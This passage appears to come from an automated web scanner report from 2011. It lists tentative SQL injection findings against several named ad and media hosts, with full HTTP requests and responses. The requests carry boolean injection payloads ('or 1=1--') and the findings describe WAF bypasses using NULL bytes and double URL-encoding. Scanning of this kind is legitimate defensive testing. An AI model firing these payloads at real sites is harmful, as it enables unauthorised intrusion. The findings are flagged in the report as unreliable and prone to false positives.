User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
|
1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://adsatt.abc.starwave.com |
| Path: |
/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>
</TD></TR></TABLE></BODY></HTML>
|
Request 2
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
|
1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://adsatt.abc.starwave.com |
| Path: |
/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>
</TD></TR></TABLE></BODY></HTML>
|
Request 2
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
|
1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d775029/8/923517/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc%00'/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0
|
Response 1
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1402
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.
</dd>
...[SNIP]...
|
Request 2
GET /adsc%00''/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0
|
Response 2
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
<hr>
<address
...[SNIP]...
|
1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://cdn.media.abc.go.com |
| Path: |
/m/images/global/generic/logo.png |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /m19952419'%20or%201%3d1--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B
|
Response 1
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:07:39 GMT
Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML> |
Request 2
GET /m19952419'%20or%201%3d2--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:22:39 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=274
Date: Sat, 17 Sep 2011 01:07:42 GMT
Connection: close
|
1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://googleads.g.doubleclick.net |
| Path: |
/pagead/ads |
Issue detail
The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 5631
X-XSS-Protection: 1; mode=block
<!doctype html><html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstim
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...
|
Request 2
